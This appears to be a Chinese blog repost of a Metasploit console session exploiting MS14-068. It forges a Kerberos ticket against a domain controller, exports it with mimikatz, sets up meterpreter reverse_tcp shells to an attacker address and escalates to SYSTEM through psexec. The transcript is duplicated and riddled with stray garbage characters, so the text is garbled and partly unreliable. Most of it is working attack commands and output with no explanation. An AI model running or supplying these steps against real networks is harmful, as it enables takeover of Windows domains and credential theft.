ms14-068之metasploit应用
2016-06-17 11:32
525 查看
msf > use
auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show
options5 U- @! U" R, X9 F: i
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
6 }6 ~* p, L; D0 Q7 d6 r3 A
Name Current Setting Required Description0
t6 B1 s% l) o* ] Q- g3 s) v9 W
---- --------------- -------- -----------
DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL6
_. S+ s, i) o) L; T0 \* E. X
PASSWORD yes The Domain User password
RHOST yes The target address
RPORT 88 yes The target port9
O+ ^* w W: P$ k8 E! l
Timeout 10 yes The TCP timeout to establish connection and read data$
w' K9 W% {# ]; P7 q
USER yes The Domain User+
t9 N+ Y4 G) f2 l
USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-10000
@( T9 O- M3 y$ B
" G9 r. R8 W. j$ |* S
msf auxiliary(ms14_068_kerberos_checksum) > set
DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set
PASSWORD juan, O7 V% R8 _/ l8 ?$ z H- C( ?
PASSWORD => juan'
l: f/ }! W( [, m r
msf auxiliary(ms14_068_kerberos_checksum) > set
USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set
USER_SID S-1-5-21-1755879683-3641577184-3486455962-1000
USER_SID => S-1-5-21-1755879683-3641577184-3486455962-1000
msf auxiliary(ms14_068_kerberos_checksum) > set
RHOST WIN-F46QAN3U3UH.demo.local# S- I, H% y8 y* X' q) d3 H1 W
RHOST => WIN-F46QAN3U3UH.demo.local
msf auxiliary(ms14_068_kerberos_checksum) > run
6 b# \$ V! [0 [
Validating options...
Using domain DEMO.LOCAL...
WIN-F46QAN3U3UH.demo.local:88 - Sending AS-REQ...
WIN-F46QAN3U3UH.demo.local:88 - Parsing AS-REP...
WIN-F46QAN3U3UH.demo.local:88 - Sending TGS-REQ...! z+ a" J d7 j7 ], ~8 C# L
[+] WIN-F46QAN3U3UH.demo.local:88 - Valid TGS-Response, extracting credentials...
[+] WIN-F46QAN3U3UH.demo.local:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141223201326_default_172.16.158.135_windows.kerber os_194320.bin
Auxiliary module execution completed8 q6 k8 X1 j% v* l0 u
----------------------------------------------
mimikatz # kerberos::clist "20141223201326_default_172.16.158.135_windows.kerber
os_194320.bin" /export/ t1 D5 Q6 p$ o9 W; ?) h6 Q) F
Principal : (01) : juan ; @ DEMO.LOCAL
Data 0
Start/End/MaxRenew: 12/24/2014 3:13:21 AM ; 12/24/2014 1:13:06 PM ; 1
2/31/2014 3:13:06 AM% F* @) _0 n: R& x
Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
Target Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL" d7 X# H# O1 i. h1 x$ ^! ~
Client Name (01) : juan ; @ DEMO.LOCAL6 i0 p! U% L* @7 J& F& H! u
Flags 00000000 :- E& q% h# n2 K
Session Key : 0x00000017 - rc4_hmac_nt8 [+ q f5 B' P1 P8 G
1cf7188debe40565eb668b5fa0bf94fb
Ticket : 0x00000000 - null ; kvno = 2; f, _6 _. m. ^( i8 B6 _
[...]
* Saved to file 0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi !
mimikatz #; Q Q" e, V+ g6 `+ Y: O3 M; f3 h- B
---------------------------------------------
( P4 B1 x" x3 A# c6 \' Z5 f% P, O$ Y
" a( S# F1 O* Z w4 L# q& Z
msf auxiliary(ms14_068_kerberos_checksum) > use exploit/multi/handler9 N, ~; }# z6 z0 I' {
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp2 v6 i, O7 c: ]$ k ^
payload => windows/meterpreter/reverse_tcp% S9 @% E4 g2 C0 m
msf exploit(handler) > set lhost 172.16.158.19 @' ^2 n# A/ o8 q
lhost => 172.16.158.1+ E2 |; r l* T8 F6 R8 ^
msf exploit(handler) > exploit
Started reverse handler on 172.16.158.1:4444
Starting the payload handler...
Sending stage (770048 bytes) to 172.16.158.131) b6 f" d ?# C2 } q) w7 d
; v b1 H- {0 v: Z7 c9 {
meterpreter > getuid' `9 V0 S m' Q6 p
Server username: DEMO\juan9 ^. P0 X5 g/ X5 P
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )1
D6 _6 Q- V- _
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)$
A# Z7 M% _) w/ N
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
success.
meterpreter > kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi
Using Kerberos ticket stored in /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi, 1143 bytes8 w, ~' U# U# Q" }. {7 b
[+] Kerberos ticket applied successfully
meterpreter >7 i; F; q/ {4 |+ s
meterpreter > background
Backgrounding session 1...
msf exploit(handler) > sessions: P6 X7 h1 R8 F* u( E* d4 Y
Active sessions# u& e2 _# r i/ s. h
===============7 G% c% Y4 @! W- f6 k# e P/ t$ D N
Id Type Information Connection& U; Z- _5 E4 K! k$ ?* T5 p
-- ---- ----------- ----------" `4 o' f, [ D; y2 m& U1 G! e
1 meterpreter x86/win32 DEMO\juan @ EXPLOITER 172.16.158.1:4444 -> 172.16.158.131:63380 (172.16.158.131)* T8 H' A5 q. |9 j: X/ d( ]
* R. ]7 k P+ c
msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH0 x5 h6 h3 a) ~- y1 \: [
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local, h4 Z( {5 {/ O# i4 b
RHOSTS => WIN-F46QAN3U3UH.demo.local$ ~* q ^; _8 @. x( N6 _. S
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp& Y% [( U# [# l2 D
payload => windows/meterpreter/reverse_tcp$ x6 z+ f- @' V1 j
msf exploit(current_user_psexec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(current_user_psexec) > set SESSION 1# C3 b7 k: j1 W J V M3 @
SESSION => 1
msf exploit(current_user_psexec) > exploit& c6 e) Z+ v9 x* l
Started reverse handler on 172.16.158.1:4444
WIN-F46QAN3U3UH.demo.local Creating service 51cq2zJN6p
WIN-F46QAN3U3UH.demo.local Starting the service
Sending stage (770048 bytes) to 172.16.158.135
WIN-F46QAN3U3UH.demo.local Deleting the service& E2 j& \ O6 @& s
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM' M7 f) z/ T' T0 K- q- B, Q
* x1 K/ c8 a4 Q9 G8 J
auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show
options5 U- @! U" R, X9 F: i
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
6 }6 ~* p, L; D0 Q7 d6 r3 A
Name Current Setting Required Description0
t6 B1 s% l) o* ] Q- g3 s) v9 W
---- --------------- -------- -----------
DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL6
_. S+ s, i) o) L; T0 \* E. X
PASSWORD yes The Domain User password
RHOST yes The target address
RPORT 88 yes The target port9
O+ ^* w W: P$ k8 E! l
Timeout 10 yes The TCP timeout to establish connection and read data$
w' K9 W% {# ]; P7 q
USER yes The Domain User+
t9 N+ Y4 G) f2 l
USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-10000
@( T9 O- M3 y$ B
" G9 r. R8 W. j$ |* S
msf auxiliary(ms14_068_kerberos_checksum) > set
DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set
PASSWORD juan, O7 V% R8 _/ l8 ?$ z H- C( ?
PASSWORD => juan'
l: f/ }! W( [, m r
msf auxiliary(ms14_068_kerberos_checksum) > set
USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set
USER_SID S-1-5-21-1755879683-3641577184-3486455962-1000
USER_SID => S-1-5-21-1755879683-3641577184-3486455962-1000
msf auxiliary(ms14_068_kerberos_checksum) > set
RHOST WIN-F46QAN3U3UH.demo.local# S- I, H% y8 y* X' q) d3 H1 W
RHOST => WIN-F46QAN3U3UH.demo.local
msf auxiliary(ms14_068_kerberos_checksum) > run
6 b# \$ V! [0 [
Validating options...
Using domain DEMO.LOCAL...
WIN-F46QAN3U3UH.demo.local:88 - Sending AS-REQ...
WIN-F46QAN3U3UH.demo.local:88 - Parsing AS-REP...
WIN-F46QAN3U3UH.demo.local:88 - Sending TGS-REQ...! z+ a" J d7 j7 ], ~8 C# L
[+] WIN-F46QAN3U3UH.demo.local:88 - Valid TGS-Response, extracting credentials...
[+] WIN-F46QAN3U3UH.demo.local:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141223201326_default_172.16.158.135_windows.kerber os_194320.bin
Auxiliary module execution completed8 q6 k8 X1 j% v* l0 u
----------------------------------------------
mimikatz # kerberos::clist "20141223201326_default_172.16.158.135_windows.kerber
os_194320.bin" /export/ t1 D5 Q6 p$ o9 W; ?) h6 Q) F
Principal : (01) : juan ; @ DEMO.LOCAL
Data 0
Start/End/MaxRenew: 12/24/2014 3:13:21 AM ; 12/24/2014 1:13:06 PM ; 1
2/31/2014 3:13:06 AM% F* @) _0 n: R& x
Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
Target Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL" d7 X# H# O1 i. h1 x$ ^! ~
Client Name (01) : juan ; @ DEMO.LOCAL6 i0 p! U% L* @7 J& F& H! u
Flags 00000000 :- E& q% h# n2 K
Session Key : 0x00000017 - rc4_hmac_nt8 [+ q f5 B' P1 P8 G
1cf7188debe40565eb668b5fa0bf94fb
Ticket : 0x00000000 - null ; kvno = 2; f, _6 _. m. ^( i8 B6 _
[...]
* Saved to file 0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi !
mimikatz #; Q Q" e, V+ g6 `+ Y: O3 M; f3 h- B
---------------------------------------------
( P4 B1 x" x3 A# c6 \' Z5 f% P, O$ Y
" a( S# F1 O* Z w4 L# q& Z
msf auxiliary(ms14_068_kerberos_checksum) > use exploit/multi/handler9 N, ~; }# z6 z0 I' {
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp2 v6 i, O7 c: ]$ k ^
payload => windows/meterpreter/reverse_tcp% S9 @% E4 g2 C0 m
msf exploit(handler) > set lhost 172.16.158.19 @' ^2 n# A/ o8 q
lhost => 172.16.158.1+ E2 |; r l* T8 F6 R8 ^
msf exploit(handler) > exploit
Started reverse handler on 172.16.158.1:4444
Starting the payload handler...
Sending stage (770048 bytes) to 172.16.158.131) b6 f" d ?# C2 } q) w7 d
; v b1 H- {0 v: Z7 c9 {
meterpreter > getuid' `9 V0 S m' Q6 p
Server username: DEMO\juan9 ^. P0 X5 g/ X5 P
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )1
D6 _6 Q- V- _
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)$
A# Z7 M% _) w/ N
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
success.
meterpreter > kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi
Using Kerberos ticket stored in /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi, 1143 bytes8 w, ~' U# U# Q" }. {7 b
[+] Kerberos ticket applied successfully
meterpreter >7 i; F; q/ {4 |+ s
meterpreter > background
Backgrounding session 1...
msf exploit(handler) > sessions: P6 X7 h1 R8 F* u( E* d4 Y
Active sessions# u& e2 _# r i/ s. h
===============7 G% c% Y4 @! W- f6 k# e P/ t$ D N
Id Type Information Connection& U; Z- _5 E4 K! k$ ?* T5 p
-- ---- ----------- ----------" `4 o' f, [ D; y2 m& U1 G! e
1 meterpreter x86/win32 DEMO\juan @ EXPLOITER 172.16.158.1:4444 -> 172.16.158.131:63380 (172.16.158.131)* T8 H' A5 q. |9 j: X/ d( ]
* R. ]7 k P+ c
msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH0 x5 h6 h3 a) ~- y1 \: [
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local, h4 Z( {5 {/ O# i4 b
RHOSTS => WIN-F46QAN3U3UH.demo.local$ ~* q ^; _8 @. x( N6 _. S
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp& Y% [( U# [# l2 D
payload => windows/meterpreter/reverse_tcp$ x6 z+ f- @' V1 j
msf exploit(current_user_psexec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(current_user_psexec) > set SESSION 1# C3 b7 k: j1 W J V M3 @
SESSION => 1
msf exploit(current_user_psexec) > exploit& c6 e) Z+ v9 x* l
Started reverse handler on 172.16.158.1:4444
WIN-F46QAN3U3UH.demo.local Creating service 51cq2zJN6p
WIN-F46QAN3U3UH.demo.local Starting the service
Sending stage (770048 bytes) to 172.16.158.135
WIN-F46QAN3U3UH.demo.local Deleting the service& E2 j& \ O6 @& s
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM' M7 f) z/ T' T0 K- q- B, Q
* x1 K/ c8 a4 Q9 G8 J
相关文章推荐
- phpwind Exp 漏洞利用
- 常见SQL Server 2000漏洞及其相关利用1
- mixed content/display——https载入http资源的绕过
- MS15-077 HT Windows字体提权0day 源码+exp
- ms14-068域提权
- mimikatz.exe的使用
- 简单分析了网马样本
- LNK快捷方式漏洞利用方式 exp制作教程 推荐
- 利用CVE-2017-11882漏洞利用的恶意样本分析
- CVE-2017-11826漏洞利用样本分析
- 利用 NetBIOS 协议名称解析及 WPAD 进行内网渗透
- ms14-068的深入分析
- php://filter漏洞利用实例
- 栈溢出利用之DynELF实例
- 栈溢出漏洞利用小结
- Ubuntu 16.04 for pwn
- 初探ROP攻击 Memory Leak & DynELF
- 小白日记19:kali渗透测试之选择和修改EXP
- windows上IPC配置不当利用以及防护
- 利用漏洞 MS12-020(WINxp)